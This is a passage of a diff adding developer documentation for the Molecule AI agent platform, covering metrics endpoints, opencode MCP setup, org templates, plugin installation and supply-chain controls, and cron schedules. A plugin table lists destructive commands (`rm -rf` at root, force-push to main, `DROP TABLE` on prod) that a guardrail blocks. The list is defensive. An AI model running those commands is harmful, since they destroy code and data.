Track LLM token consumption per workspace — input tokens, output tokens, and Anthropic prompt-cache reads/writes — aggregated over two rolling windows:
```
GET /workspaces/:id/metrics
```
Requires a **workspace bearer token** (`Authorization: Bearer <token>`). Returns:
```json
{
"workspace_id": "uuid",
"token_metrics": {
"1h": {
"input_tokens": 1250,
"output_tokens": 430,
"cache_read_tokens": 800,
"cache_write_tokens": 200
},
"30d": {
"input_tokens": 84200,
"output_tokens": 28100,
"cache_read_tokens": 52000,
"cache_write_tokens": 9400
}
}
}
```
| Field | Description |
|-------|-------------|
| `input_tokens` | Tokens in the prompt sent to the LLM (sum over window) |
| `output_tokens` | Tokens in the completion returned by the LLM |
| `cache_read_tokens` | Prompt tokens served from Anthropic's prompt cache |
| `cache_write_tokens` | Prompt tokens written into Anthropic's prompt cache |
The **canvas WorkspaceUsage panel** (⊞ icon → Usage tab) displays these same metrics live, updating each time the workspace reports a heartbeat.
## Admin Liveness
The liveness endpoint reports the health of every supervised subsystem:
```
GET /admin/liveness
```
This endpoint requires `AdminAuth` (bearer token). It returns a `supervised.Snapshot()` for each subsystem with ages -- how long since each subsystem last reported healthy. Use this to debug stuck schedulers, stalled heartbeat goroutines, or unresponsive health sweeps before diving into logs.
## WebSocket Events
The canvas receives real-time updates via WebSocket at `/ws`. Every state change in the platform is broadcast to connected clients:
| Event | Trigger |
|-------|---------|
| `WORKSPACE_ONLINE` | Workspace registers successfully |
| `WORKSPACE_OFFLINE` | Heartbeat TTL expires or health sweep detects dead container |
| `WORKSPACE_DEGRADED` | Error rate exceeds threshold |
| `WORKSPACE_RECOVERED` | Error rate drops back to normal |
| `WORKSPACE_REMOVED` | Workspace deleted |
| `HEARTBEAT` | Periodic heartbeat from workspace |
| `A2A_RESPONSE` | Agent-to-agent message received |
| `AGENT_MESSAGE` | Agent pushes a message to the user |
Events flow through Redis pub/sub to ensure all platform instances broadcast consistently.
## Structure Events
The `structure_events` table is an append-only audit log of every structural change in the platform. Each event is:
1. Inserted into the database via `broadcaster.RecordAndBroadcast()`
2. Published to Redis pub/sub
3. Relayed to WebSocket clients
Query events for a specific workspace or globally:
```
GET /events/:workspaceId # Workspace-specific
GET /events # All events
```
Both endpoints require `AdminAuth`.
## Session Search
Search through chat history for a workspace:
```
GET /workspaces/:id/session-search?q=deployment+error
```
This searches across both user-agent conversations and agent-to-agent A2A traffic stored in the activity logs.
## Current Task Visibility
Each workspace reports its current task via heartbeat. This is visible in two places:
- **Canvas node** -- the workspace card on the canvas shows the current task text
- **Heartbeat data** -- `GET /registry/discover/:id` includes `current_task` in the workspace info
When `active_tasks` drops to zero, the current task field clears and the idle loop (if configured) begins its countdown.
## Schedule Run History
For workspaces with cron schedules, inspect past runs:
```
GET /workspaces/:id/schedules/:scheduleId/history
```
Each history entry includes:
- Execution timestamp
- Status (`success`, `failed`, `skipped`)
- Duration
- `error_detail` when the run failed (populated by `scheduler.fireSchedule`)
A status of `skipped` means the workspace was busy (active tasks > 0) when the schedule fired and the concurrency-aware scheduler chose not to queue the prompt.

165
content/docs/opencode.mdx Normal file
View File

@ -0,0 +1,165 @@
---
title: opencode Integration
description: Use opencode as an AI coding agent connected to your Molecule AI workspace via remote MCP.
---
## Overview
[opencode](https://opencode.ai) is an AI coding agent that supports remote MCP
servers via `opencode.json`. With Molecule AI's MCP bridge you can wire opencode
directly to your workspace — giving it the full A2A tool surface
(`delegate_task`, `list_peers`, `recall_memory`, and more) over a standard
`Authorization: Bearer` connection.
```
opencode (terminal)
↕ opencode.json declares remote MCP
Molecule AI MCP endpoint
↕ WorkspaceAuth middleware
Your workspace agent
```
---
## Prerequisites
- A running Molecule AI platform (`MOLECULE_MCP_URL` — e.g. `https://api.molecule.ai`)
- A workspace-scoped bearer token (`MOLECULE_MCP_TOKEN`) issued via the platform API (see [Token Management](/docs/tokens))
---
## 1. Declare Molecule as a remote MCP server
Create (or extend) `opencode.json` in your project root:
```json
{
"mcpServers": {
"molecule": {
"type": "remote",
"url": "${MOLECULE_MCP_URL}/workspaces/${WORKSPACE_ID}/mcp",
"headers": { "Authorization": "Bearer ${MOLECULE_MCP_TOKEN}" },
"description": "Molecule AI A2A orchestration — delegate_task, list_peers, check_task_status"
}
}
}
```
> ⚠️ **Never embed the token in the URL** (e.g. `?token=…`). Always use the
> `Authorization: Bearer` header — URL-embedded tokens appear in server logs,
> browser history, and Git history if the file is committed.
A pre-configured template is available in
`org-templates/molecule-dev/opencode.json` in the monorepo.
---
## 2. Obtain a workspace-scoped token
```bash
curl -X POST https://$MOLECULE_MCP_URL/workspaces/$WORKSPACE_ID/tokens \
-H "Authorization: Bearer $ADMIN_TOKEN" \
-H "Content-Type: application/json" \
-d '{"name": "opencode-agent", "scopes": ["mcp:read", "mcp:delegate"]}'
```
Store the returned token as `MOLECULE_MCP_TOKEN` in your `.env`.
See [Token Management](/docs/tokens) for rotation, revocation, and auditing.
---
## 3. Available tools
When opencode connects to the Molecule MCP endpoint the agent gains access to:
| Tool | Description |
|------|-------------|
| `list_peers` | Discover available workspaces in your org |
| `delegate_task` | Send a task to a peer workspace and wait for the result |
| `delegate_task_async` | Fire-and-forget task delegation; returns a `task_id` |
| `check_task_status` | Poll an async delegation by `task_id` |
| `commit_memory` | Persist information to `LOCAL` or `TEAM` memory scope |
| `recall_memory` | Search previously committed memories |
### Restricted tools
- **`send_message_to_user`** — disabled for remote MCP callers by default. Enable
with `MOLECULE_MCP_ALLOW_SEND_MESSAGE=true` in your platform env.
- **`GLOBAL` memory scope** — `commit_memory` with `scope: GLOBAL` is blocked for
external agents. `LOCAL` and `TEAM` scopes are always available.
---
## 4. Example: delegate a research task
Once connected, opencode can call Molecule tools directly in its tool loop:
```json
{
"tool": "delegate_task",
"arguments": {
"target": "research-lead",
"task": "Summarise the last 7 days of commits in Molecule-AI/molecule-monorepo"
}
}
```
The platform routes the task to your `research-lead` workspace and streams the
response back to opencode.
---
## 5. Two transports
The MCP endpoint supports two transports — opencode auto-selects:
| Transport | Endpoint | Notes |
|-----------|----------|-------|
| Streamable HTTP (primary) | `POST /workspaces/:id/mcp` | MCP 2024-11-05, recommended |
| SSE (backwards compat) | `GET /workspaces/:id/mcp/stream` | Legacy clients |
---
## 6. Security notes
### Org topology exposure (SAFE-T1401)
`list_peers` returns the full set of workspace names and roles visible to your
workspace. Any opencode agent with a valid `MOLECULE_MCP_TOKEN` can enumerate
your org topology. Issue tokens to only the workspaces that need peer visibility.
### Tool surface audit (SAFE-T1201)
The full `@molecule-ai/mcp-server` package exposes additional tools beyond those
listed above. A complete SAFE-T1201 audit is in progress. **Until that audit
completes, do not expose the MCP server to untrusted external agents in
production.**
### Token scoping
Issue tokens with the minimum required scopes (`mcp:read`, `mcp:delegate`).
Rotate tokens regularly. Revoke via `DELETE /workspaces/:id/tokens/:token_id`.
---
## 7. Environment variables
Add to your `.env`:
```bash
MOLECULE_MCP_URL=https://api.molecule.ai # or http://localhost:8080 for local dev
MOLECULE_MCP_TOKEN= # workspace-scoped bearer token (step 2)
WORKSPACE_ID= # UUID of the workspace opencode acts as
# find it in the Canvas sidebar or GET /workspaces
```
See `.env.example` in the monorepo for the full canonical reference.
---
## Related
- [MCP Server](/docs/mcp-server) — full tool catalogue for the `@molecule-ai/mcp-server` package
- [Token Management](/docs/tokens) — issue, rotate, and revoke workspace tokens
- [External Agents](/docs/external-agents) — register any HTTP agent as a first-class workspace

View File

@ -0,0 +1,166 @@
---
title: Org Templates
description: Deploy entire multi-workspace organizations from a single YAML file.
---
## Overview
Org templates let you define an entire agent organization -- hierarchy of workspaces with roles, configurations, and relationships -- in a single YAML file. Import one template and the platform provisions every workspace, wires parent-child relationships, seeds schedules, and installs plugins automatically.
## YAML Structure
A minimal org template looks like this:
```yaml
org_name: molecule-dev
defaults:
runtime: claude-code
tier: 2
plugins:
- molecule-dev
- molecule-careful-bash
workspaces:
pm:
name: Project Manager
role: PM
tier: 3
children:
dev-lead:
name: Dev Lead
children:
backend:
name: Backend Engineer
frontend:
name: Frontend Engineer
marketing:
name: Marketing Specialist
runtime: langgraph
```
The `workspaces` map defines the hierarchy. Each key becomes the workspace's slug. Nesting under `children` sets the parent-child relationship automatically.
## Workspace Fields
Each workspace entry supports the following fields:
| Field | Type | Description |
|-------|------|-------------|
| `name` | string | Display name shown on the canvas |
| `role` | string | Agent role (e.g. PM, Engineer, Researcher) |
| `runtime` | string | Runtime adapter (`claude-code`, `langgraph`, `crewai`, etc.) |
| `tier` | integer | Resource tier (2 = Standard, 3 = Privileged, 4 = Full-host) |
| `workspace_dir` | string | Host path for `/workspace` bind-mount |
| `plugins` | list | Plugins to install on this workspace |
| `initial_prompt` | string | Prompt auto-executed after A2A server is ready |
| `idle_prompt` | string | Prompt fired periodically while workspace is idle |
| `idle_interval_seconds` | integer | Interval for idle prompt (default 600, minimum 60) |
| `channels` | list | Social channel integrations (Telegram, Slack, etc.) |
| `schedules` | list | Cron schedules seeded on import |
| `x` | number | Canvas X coordinate |
| `y` | number | Canvas Y coordinate |
| `children` | map | Nested child workspaces |
## Defaults Layer
The `defaults` block sets baseline values for every workspace in the template. Per-workspace fields override defaults when specified.
**Plugin merging is additive.** Per-workspace `plugins` lists UNION with `defaults.plugins` (deduplicated, defaults first) -- they do not replace them. To opt a specific default plugin out for a given workspace, prefix the plugin name with `!` or `-`:
```yaml
defaults:
plugins:
- molecule-dev
- molecule-careful-bash
- browser-automation
workspaces:
backend:
name: Backend Engineer
plugins:
- molecule-skill-code-review # added
- "!browser-automation" # opted out of default
```
In this example, the backend workspace gets `molecule-dev`, `molecule-careful-bash`, and `molecule-skill-code-review` -- but not `browser-automation`.
## Template Registry
Five org templates live in standalone repos under the `Molecule-AI` GitHub organization:
| Template | Repo |
|----------|------|
| molecule-dev | `Molecule-AI/molecule-ai-org-template-molecule-dev` |
| marketing-team | `Molecule-AI/molecule-ai-org-template-marketing-team` |
| research-lab | `Molecule-AI/molecule-ai-org-template-research-lab` |
| startup-mvp | `Molecule-AI/molecule-ai-org-template-startup-mvp` |
| enterprise-ops | `Molecule-AI/molecule-ai-org-template-enterprise-ops` |
These are cloned into the platform image at Docker build time and registered in the `template_registry` database table.
## Importing an Org Template
### Via API
```bash
curl -X POST http://localhost:8080/org/import \
-H "Content-Type: application/json" \
-H "Authorization: Bearer $TOKEN" \
-d '{"dir": "molecule-dev"}'
```
The `POST /org/import` endpoint requires `AdminAuth` (bearer token). The `dir` field references a template directory name from the registry.
### Via Canvas
Open the template browser in the canvas sidebar and select an org template. The UI calls the same API endpoint.
## Initial Prompts
Workspaces can auto-execute a prompt on startup before any user interaction. Set `initial_prompt` as an inline string or point `initial_prompt_file` to a path relative to the config directory.
After the A2A server is ready, the runtime sends the prompt as a `message/send` to itself. A `.initial_prompt_done` marker file prevents re-execution on restart.
**Important:** Initial prompts must NOT send A2A messages (`delegate_task`, `send_message_to_user`) because other agents may not be ready yet. Keep them local: clone a repo, read docs, save to memory, wait for tasks.
Org templates support `initial_prompt` on both `defaults` (all agents) and per-workspace (overrides default).
## Idle Loop
The idle loop is an opt-in pattern for workspaces that should do periodic background work when they have no active tasks.
When `idle_prompt` is non-empty in the workspace config, the runtime self-sends the prompt every `idle_interval_seconds` (default 600) while `heartbeat.active_tasks == 0`. The fire timeout clamps to `max(60, min(300, idle_interval_seconds))`.
Set per-workspace or as an org template default:
```yaml
defaults:
idle_prompt: "Check for new issues and update your task list."
idle_interval_seconds: 300
```
The idle check is local (no LLM call) and the prompt only fires when there is genuinely nothing to do, so cost collapses to event-driven.
## Canvas Positioning
Use `x` and `y` fields to control where workspaces appear on the drag-and-drop canvas after import:
```yaml
workspaces:
pm:
name: Project Manager
x: 400
y: 100
children:
dev:
name: Developer
x: 200
y: 300
researcher:
name: Researcher
x: 600
y: 300
```
If coordinates are omitted, the canvas auto-layouts new workspaces.

388
content/docs/plugins.mdx Normal file
View File

@ -0,0 +1,388 @@
---
title: Plugins
description: Extend workspace capabilities with modular plugins — guardrails, skills, workflows.
---
## Overview
Plugins are installable capability bundles that extend what a workspace can do.
They range from ambient guardrails that enforce rules automatically, to
on-demand skills invoked via the `Skill` tool, to workflow plugins that
compose skills into slash commands.
Plugins follow a **two-axis model**: the *source* (where the plugin comes from)
is orthogonal to the *shape* (what format it takes). This means you can install
a plugin from a local registry or from GitHub, and the workspace runtime
figures out how to load it based on its shape.
---
## Two-Axis Model
### Sources (where)
| Scheme | Description | Example |
|--------|-------------|---------|
| `local://` | Platform's curated plugin registry (auto-discovered from the `plugins/` directory) | `local://molecule-careful-bash` |
| `github://` (pinned) | GitHub repo at a specific tag or commit SHA — **required for all installs** | `github://owner/repo#v1.2.0` |
| `github://` (SHA) | Pin to an exact immutable commit | `github://owner/repo#abc1234` |
Use `GET /plugins/sources` to list all registered install-source schemes at
runtime.
### Shapes (what)
| Shape | Description |
|-------|-------------|
| agentskills.io format | `SKILL.md` + optional scripts, hooks, and `plugin.yaml` manifest |
| MCP server | Model Context Protocol server (coming soon for more runtimes) |
The shape is orthogonal to the source. A `github://` plugin and a `local://`
plugin can both be agentskills.io format. The per-runtime adapter inside the
workspace handles loading at startup.
---
## Installing a Plugin
```bash
curl -X POST http://localhost:8080/workspaces/{id}/plugins \
-H "Content-Type: application/json" \
-H "Authorization: Bearer {token}" \
-d '{"source": "local://molecule-careful-bash"}'
```
From GitHub (pinned ref required):
```bash
curl -X POST http://localhost:8080/workspaces/{id}/plugins \
-H "Content-Type: application/json" \
-H "Authorization: Bearer {token}" \
-d '{"source": "github://Molecule-AI/molecule-plugin-careful-bash#v1.0.0"}'
```
<Callout type="warn">
**Pinned refs are required.** `github://owner/repo` without a `#tag` or `#sha` suffix returns **HTTP 422 Unprocessable Entity**. Always pin to a specific tag (e.g. `#v1.0.0`) or commit SHA (e.g. `#abc1234`). See [Supply Chain Security](#supply-chain-security) for details and the escape hatch.
</Callout>
The platform resolves the source, stages the plugin files, copies them into the
workspace container at `/configs/plugins/<name>/`, and triggers an automatic
workspace restart so the runtime picks up the new plugin.
---
## Uninstalling a Plugin
```bash
curl -X DELETE http://localhost:8080/workspaces/{id}/plugins/{name} \
-H "Authorization: Bearer {token}"
```
Uninstall removes the plugin directory, cleans up copied skill directories and
rule markers from `CLAUDE.md`, and triggers an automatic workspace restart.
---
## Listing Plugins
### Platform Registry
List all available plugins in the platform registry:
```bash
# All plugins
curl http://localhost:8080/plugins
# Filtered by runtime
curl http://localhost:8080/plugins?runtime=claude-code
```
Plugins with no declared `runtimes` field in their manifest are treated as
"unspecified, try it" and included in filtered results.
### Available for a Workspace
Returns plugins filtered to those supported by the workspace's current runtime:
```bash
curl http://localhost:8080/workspaces/{id}/plugins/available \
-H "Authorization: Bearer {token}"
```
### Installed on a Workspace
```bash
curl http://localhost:8080/workspaces/{id}/plugins \
-H "Authorization: Bearer {token}"
```
Each installed plugin is annotated with whether it still supports the
workspace's current runtime. This lets the canvas grey out plugins that went
inert after a runtime change.
---
## Runtime Compatibility Check
Before changing a workspace's runtime, check which installed plugins would
become incompatible:
```bash
curl "http://localhost:8080/workspaces/{id}/plugins/compatibility?runtime=langgraph" \
-H "Authorization: Bearer {token}"
```
Response:
```json
{
"target_runtime": "langgraph",
"compatible": [...],
"incompatible": [...],
"all_compatible": false
}
```
The canvas uses this to show a confirmation dialog before applying a runtime
change.
---
## Built-in Plugins
### Hook Plugins (ambient enforcement)
These fire automatically via the harness layer. No explicit invocation needed.
| Plugin | Purpose |
|--------|---------|
| `molecule-careful-bash` | Refuses `git push --force` to main, `rm -rf` at root, `DROP TABLE` against prod schema. Ships the `careful-mode` skill as documentation. |
| `molecule-freeze-scope` | Locks edits to a single path glob via `.claude/freeze`. Useful while debugging. |
| `molecule-audit-trail` | Appends every Edit/Write to `.claude/audit.jsonl` for accountability. |
| `molecule-session-context` | Auto-loads recent cron-learnings and open PR/issue counts at session start. |
| `molecule-prompt-watchdog` | Injects warning context when the prompt mentions destructive keywords. |
### Skill Plugins (on-demand)
Invoked explicitly via the `Skill` tool during a conversation.
| Plugin | Purpose |
|--------|---------|
| `molecule-skill-code-review` | 16-criteria multi-axis code review rubric. |
| `molecule-skill-cross-vendor-review` | Adversarial second-model review for noteworthy PRs. |
| `molecule-skill-llm-judge` | Score whether a deliverable addresses the original request. |
| `molecule-skill-update-docs` | Sync repo docs after merges. |
| `molecule-skill-cron-learnings` | Defines the operational-memory JSONL format. |
### Workflow Plugins (slash commands)
Compose skills into repeatable multi-step workflows.
| Plugin | Command | Purpose |
|--------|---------|---------|
| `molecule-workflow-triage` | `/triage` | Full PR-triage cycle (gates 1-7 + code-review + merge if green). |
| `molecule-workflow-retro` | `/retro` | Weekly retrospective issue. |
### Shared Plugins
Loaded by default from the `plugins/` directory at the repo root.
| Plugin | Purpose |
|--------|---------|
| `molecule-dev` | Codebase conventions (rules injected into CLAUDE.md) + `review-loop` skill. |
| `superpowers` | `verification-before-completion`, `test-driven-development`, `systematic-debugging`, `writing-plans`. |
| `ecc` | General Claude Code guardrails. |
| `browser-automation` | Puppeteer/CDP-based web scraping and live canvas screenshots. Opt-in per workspace. |
### Platform Opt-in Plugins
Available in the platform registry (`local://`) but not installed by default.
Add them per workspace or as org defaults as needed.
| Plugin | Tools | Requires | Purpose |
|--------|-------|----------|---------|
| `molecule-medo` | `create_medo_app`, `update_medo_app`, `publish_medo_app` | `MEDO_API_KEY` secret | Baidu MeDo app builder integration — create, update, and publish MeDo mini-apps from within an agent. |
#### Installing molecule-medo
```bash
# 1. Set your API key
curl -X POST http://localhost:8080/workspaces/{id}/secrets \
-H "Authorization: Bearer {token}" \
-H "Content-Type: application/json" \
-d '{"key": "MEDO_API_KEY", "value": "your-medo-api-key"}'
# 2. Install the plugin (triggers auto-restart)
curl -X POST http://localhost:8080/workspaces/{id}/plugins \
-H "Authorization: Bearer {token}" \
-H "Content-Type: application/json" \
-d '{"source": "local://molecule-medo"}'
```
Or add it to `org.yaml`:
```yaml
workspaces:
- name: App Builder
plugins: [molecule-medo]
secrets:
MEDO_API_KEY: "${MEDO_API_KEY}"
```
---
## Org Template Plugin Resolution
When deploying an org template, per-workspace `plugins:` lists in `org.yaml`
role overrides **UNION** with `defaults.plugins` (deduplicated, defaults first).
They do not replace them.
To opt a specific default out for a given role or workspace, prefix the plugin
name with `!` or `-`:
```yaml
defaults:
plugins:
- molecule-careful-bash
- molecule-audit-trail
- superpowers
workspaces:
researcher:
role: "Research Analyst"
plugins:
- browser-automation # added on top of defaults
- "!superpowers" # opted out of superpowers
```
Result for the `researcher` workspace:
`molecule-careful-bash`, `molecule-audit-trail`, `browser-automation`
---
## Install Safeguards
Environment variables that bound the cost and security of a single plugin install:
| Variable | Default | Description |
|----------|---------|-------------|
| `PLUGIN_INSTALL_BODY_MAX_BYTES` | `65536` (64 KiB) | Max request body size |
| `PLUGIN_INSTALL_FETCH_TIMEOUT` | `5m` | Whole fetch + copy deadline |
| `PLUGIN_INSTALL_MAX_DIR_BYTES` | `104857600` (100 MiB) | Max staged-tree size |
| `PLUGIN_ALLOW_UNPINNED` | _(unset)_ | Set to `true` to allow bare `github://owner/repo` refs without a tag or SHA. **Development use only — never set in production.** |
These prevent a slow or malicious source from tying up a handler goroutine or
exhausting disk space.
---
## Supply Chain Security
The platform enforces two controls to protect against compromised or tampered plugin sources (SAFE-T1102):
### 1. Pinned refs (enforced)
All `github://` installs must include a `#tag` or `#sha` suffix. This ensures the code you audit is exactly what gets installed — a push to the same branch cannot silently swap in different code between your review and a workspace restart.
```
✅ github://Molecule-AI/my-plugin#v1.2.3 (semver tag)
✅ github://Molecule-AI/my-plugin#abc1234def (commit SHA)
❌ github://Molecule-AI/my-plugin (→ HTTP 422)
```
To bypass during local development, set `PLUGIN_ALLOW_UNPINNED=true` in your platform environment. **Do not set this in production.**
### 2. SHA-256 content integrity (optional)
When installing from GitHub, you can provide an expected SHA-256 hash of the staged plugin tree. The platform verifies the hash before completing the install — a mismatch aborts with HTTP 422 and cleans up the staging directory.
```bash
curl -X POST http://localhost:8080/workspaces/{id}/plugins \
-H "Content-Type: application/json" \
-H "Authorization: Bearer {token}" \
-d '{
"source": "github://Molecule-AI/my-plugin#v1.2.3",
"sha256": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"
}'
```
**How the hash is computed:** Walk all non-manifest files in the staged plugin tree, sort by relative path, concatenate as `<rel-path>\x00<content>`, and compute `sha256.Sum256`. The hash is lowercase hex.
You can pre-compute the expected hash from a clean checkout:
```bash
# In a clean clone of the plugin repo at the target ref:
find . -type f ! -name 'manifest.json' | sort | \
xargs -I{} sh -c 'printf "%s\x00" "{}" && cat "{}"' | sha256sum
```
---
## Plugin Download (External Workspaces)
External workspaces (those running outside Docker) can pull plugins as gzipped
tarballs:
```bash
curl http://localhost:8080/workspaces/{id}/plugins/{name}/download \
-H "Authorization: Bearer {token}" \
-o plugin.tar.gz
```
An optional `?source=github://owner/repo` query parameter lets external
workspaces pull from upstream repos without the platform pre-staging them.
Defaults to `local://<name>` when omitted.
---
## Org-Level Plugin Governance
Tenant admins can restrict which plugins workspaces in their org are permitted to load using a per-org allowlist. When an allowlist is configured, workspaces can only install plugins explicitly listed — all other installs are blocked at load time.
### Managing the allowlist
```bash
# Allow a plugin in the org
curl -X POST http://localhost:8080/admin/orgs/{orgId}/plugins/allowlist \
-H "Authorization: Bearer <admin-token>" \
-H "Content-Type: application/json" \
-d '{"plugin_name": "molecule-audit-trail"}'
# Remove a plugin from the allowlist
curl -X DELETE http://localhost:8080/admin/orgs/{orgId}/plugins/allowlist/molecule-audit-trail \
-H "Authorization: Bearer <admin-token>"
```
Both endpoints require `AdminAuth`. `orgId` is the org's UUID (set via `MOLECULE_ORG_ID` for SaaS tenants; in self-hosted single-org mode this is the org record created at first startup).
### Behaviour when an allowlist is configured
| Scenario | Result |
|----------|--------|
| No allowlist entries for the org | All plugins are permitted (default; backward-compatible) |
| Allowlist has at least one entry | Only listed plugins may be installed; others return `403 Forbidden` |
| Plugin already installed when allowlist was created | Pre-existing installs are not removed, but the plugin cannot be re-installed if later uninstalled |
### Relationship to supply-chain pinning
The governance allowlist and supply-chain pinning (`PLUGIN_ALLOW_UNPINNED`) are independent:
- The **allowlist** controls *which* plugins workspaces can load.
- **Pinning** controls *how* plugins must be referenced (exact commit/tag, never `latest`).
Both can be active simultaneously — the most restrictive rule wins.
---
## API Reference
| Method | Path | Description |
|--------|------|-------------|
| GET | `/plugins` | List plugin registry (supports `?runtime=` filter) |
| GET | `/plugins/sources` | List registered install-source schemes |
| GET | `/workspaces/:id/plugins` | List installed plugins |
| POST | `/workspaces/:id/plugins` | Install a plugin (`{"source": "scheme://spec"}`) |
| DELETE | `/workspaces/:id/plugins/:name` | Uninstall a plugin |
| GET | `/workspaces/:id/plugins/available` | Available plugins filtered by workspace runtime |
| GET | `/workspaces/:id/plugins/compatibility?runtime=X` | Preflight runtime-change compatibility check |
| GET | `/workspaces/:id/plugins/:name/download` | Download plugin as tarball (external workspaces) |
| POST | `/admin/orgs/:orgId/plugins/allowlist` | Add a plugin to the org allowlist (AdminAuth) |
| DELETE | `/admin/orgs/:orgId/plugins/allowlist/:name` | Remove a plugin from the org allowlist (AdminAuth) |

View File

@ -1,3 +1,6 @@
---
title: "Molecule AI plugins and the agentskills.io standard"
---
# Molecule AI plugins and the agentskills.io standard
> **TL;DR** — every skill inside a Molecule AI plugin is a spec-compliant

View File

@ -1,3 +1,6 @@
---
title: "Plugin install sources"
---
# Plugin install sources
> **TL;DR** — plugin **sources** (where a plugin comes from) and plugin

View File

@ -1,3 +1,6 @@
---
title: "Cognee Architecture Deep-Dive — Workspace Isolation"
---
# Cognee Architecture Deep-Dive — Workspace Isolation
**Date:** 2026-04-20

View File

@ -1,3 +1,6 @@
---
title: "Cognee Workspace Isolation Evaluation"
---
# Cognee Workspace Isolation Evaluation
**Date:** 2026-04-20

336
content/docs/schedules.mdx Normal file
View File

@ -0,0 +1,336 @@
---
title: Schedules
description: Run recurring prompts on cron schedules — automated audits, reports, and maintenance.
---
## Overview
Schedules let you run recurring prompts against a workspace on a cron schedule.
Each tick fires an A2A `message/send` into the workspace, so the agent
processes the prompt as if it received a normal message. This enables automated
audits, daily reports, weekly retrospectives, and any other recurring task.
The scheduler polls the `workspace_schedules` table every 30 seconds. When a
schedule's `next_run_at` has passed, the scheduler fires the prompt and
computes the next run time.
```
Scheduler (30s poll) ──> workspace_schedules table
next_run_at <= now?
┌─────────┴──────────┐
│ A2A message/send │──> Workspace Agent
│ (callerID=system: │
│ scheduler) │
└─────────────────────┘
```
---
## Creating a Schedule
```bash
curl -X POST http://localhost:8080/workspaces/{id}/schedules \
-H "Content-Type: application/json" \
-H "Authorization: Bearer {token}" \
-d '{
"name": "Daily Security Audit",
"cron_expr": "0 9 * * *",
"timezone": "America/New_York",
"prompt": "Run a security audit of all open PRs. Check for leaked secrets, SQL injection, and auth bypass.",
"enabled": true
}'
```
**Required fields:**
| Field | Type | Description |
|-------|------|-------------|
| `cron_expr` | string | Standard cron expression (5-field: minute, hour, day-of-month, month, day-of-week) |
| `prompt` | string | The text sent to the workspace as an A2A message each tick |
**Optional fields:**
| Field | Type | Default | Description |
|-------|------|---------|-------------|
| `name` | string | `""` | Human-readable label |
| `timezone` | string | `"UTC"` | IANA timezone for cron evaluation (e.g. `America/New_York`, `Asia/Tokyo`) |
| `enabled` | bool | `true` | Whether the schedule fires |
The timezone is validated against Go's `time.LoadLocation` on create and update.
The cron expression is validated and the next run time is computed immediately.
---
## CRUD Operations
| Method | Path | Description |
|--------|------|-------------|
| GET | `/workspaces/:id/schedules` | List all schedules for a workspace |
| POST | `/workspaces/:id/schedules` | Create a new schedule |
| PATCH | `/workspaces/:id/schedules/:scheduleId` | Update a schedule (partial update via COALESCE) |
| DELETE | `/workspaces/:id/schedules/:scheduleId` | Delete a schedule |
### Update
PATCH accepts any subset of fields. Only provided fields are changed — the
handler uses `COALESCE` in SQL so omitted fields retain their current values.
If `cron_expr` or `timezone` changes, the next run time is recomputed.
```bash
curl -X PATCH http://localhost:8080/workspaces/{id}/schedules/{scheduleId} \
-H "Content-Type: application/json" \
-H "Authorization: Bearer {token}" \
-d '{"enabled": false}'
```
### Delete
```bash
curl -X DELETE http://localhost:8080/workspaces/{id}/schedules/{scheduleId} \
-H "Authorization: Bearer {token}"
```
All schedule operations are scoped to the owning workspace ID to prevent IDOR.
---
## Manual Trigger
Fire a schedule immediately, outside its cron cadence:
```bash
curl -X POST http://localhost:8080/workspaces/{id}/schedules/{scheduleId}/run \
-H "Authorization: Bearer {token}"
```
Returns the schedule's prompt so the frontend can POST it to
`/workspaces/:id/a2a`. This keeps the handler stateless.
---
## Run History
View the last 20 runs for a schedule, including error details for failed runs:
```bash
curl http://localhost:8080/workspaces/{id}/schedules/{scheduleId}/history \
-H "Authorization: Bearer {token}"
```
Response:
```json
[
{
"timestamp": "2026-04-16T09:00:02Z",
"duration_ms": 4523,
"status": "success",
"error_detail": "",
"request": {"schedule_id": "...", "prompt": "..."}
},
{
"timestamp": "2026-04-15T09:00:01Z",
"duration_ms": null,
"status": "error",
"error_detail": "A2A proxy returned 503: workspace container not running",
"request": {"schedule_id": "...", "prompt": "..."}
}
]
```
History is pulled from the `activity_logs` table filtered by
`activity_type = 'cron_run'` and the schedule ID in the request body.
---
## Source Field
Each schedule has a `source` field that tracks how it was created:
| Value | Meaning |
|-------|---------|
| `template` | Seeded by an org template import or bundle import. On re-import, only `template`-source rows are refreshed — `runtime` rows survive. |
| `runtime` | Created via the Canvas UI or API. These are user-owned and never overwritten by re-imports. |
---
## Status Values
The `last_status` field on a schedule tracks the outcome of the most recent
run:
| Status | Meaning |
|--------|---------|
| `success` | The A2A message was delivered and the workspace acknowledged it. |
| `error` | The A2A proxy returned a non-2xx status. `last_error` contains details. |
| `skipped` | The workspace was busy (concurrency-aware skip). The scheduler detected `active_tasks > 0` and deferred the run to avoid overloading the agent. |
---
## Schedule Health Endpoint
Peer workspaces can monitor each other's schedule health without admin auth:
```bash
curl http://localhost:8080/workspaces/{id}/schedules/health \
-H "X-Workspace-ID: {callerWorkspaceId}" \
-H "Authorization: Bearer {callerToken}"
```
This endpoint returns execution-state fields only (`last_run_at`,
`last_status`, `run_count`, `next_run_at`, `last_error`). It deliberately
omits `prompt` and `cron_expr` so sensitive task content is never exposed to
peer workspaces.
**Auth rules** (mirrors the A2A proxy pattern):
- `X-Workspace-ID` header required to identify the caller
- Caller's own bearer token validated (legacy workspaces grandfathered)
- `registry.CanCommunicate(callerID, workspaceID)` must return true
- System callers (`system:*`, `webhook:*`, `test:*`) bypass checks
- Self-calls always allowed
---
## Cross-Org Schedule Health (Admin)
Operators can retrieve schedule health for **every workspace in the org** in a single call:
```bash
curl http://localhost:8080/admin/schedules/health \
-H "Authorization: Bearer <admin-token>"
```
Requires `AdminAuth`. Returns an array covering every schedule across every workspace:
```json
[
{
"schedule_id": "uuid",
"workspace_id": "uuid",
"workspace_name": "security-auditor",
"expression": "0 */6 * * *",
"enabled": true,
"last_fired_at": "2026-04-18T12:00:00Z",
"next_scheduled_at": "2026-04-18T18:00:00Z",
"consecutive_empty": 0,
"phantom_detected": false
}
]
```
| Field | Description |
|-------|-------------|
| `last_fired_at` | Timestamp of the most recent run attempt (null if never fired) |
| `next_scheduled_at` | When the scheduler will next attempt this schedule |
| `consecutive_empty` | Count of consecutive runs that fired but received no task completion — an early indicator of a stuck or unresponsive workspace |
| `phantom_detected` | `true` if the schedule appears in the DB but its workspace has been removed; these are safe to delete |
Use this endpoint to audit cron health org-wide before a maintenance window, or to identify schedules that haven't fired when expected.
---
## Scheduler Internals
### Poll Loop
The scheduler runs a 30-second poll loop. Each tick:
